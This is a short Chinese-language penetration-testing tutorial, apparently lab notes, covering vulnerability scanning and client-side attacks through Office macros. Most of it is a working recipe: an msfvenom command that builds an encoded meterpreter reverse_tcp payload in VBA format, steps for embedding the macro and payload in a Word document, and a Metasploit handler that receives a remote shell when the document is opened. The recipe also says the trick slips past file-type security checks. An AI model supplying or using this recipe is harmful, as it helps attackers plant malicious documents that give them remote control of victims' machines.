弱点扫描
根据信息收集的结果搜索漏洞利用模块
结合外部漏洞扫描系统对大IP地址段进行批量扫描
误报率、漏报率
- VNC密码破解
客户端渗透
VBScript感染方式
利用 宏 感染word、excel文档
绕过某些基于文件类型检查的安全机制
一般人对word、excel的格式看来是没有安全威胁的,没有防范
生成Payload
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.171.129 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
生成的内容分为两个部分,一部分是宏执行的VBA代码,另一部分是Payload
生成一个空白的word文件
宏名随便输入,然后点击创建,我们拷贝生成的第一部分的内容到这里,然后点击保存
我们现在再打开 宏 ,可以看到生成了下面几个宏
然后我们拷贝第二部分,贴到word文档的正文里面,然后保存关闭
然后在Kali上启动侦听
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.171.129 exploit
当在Windows启动刚刚的word时,我们就取得shell了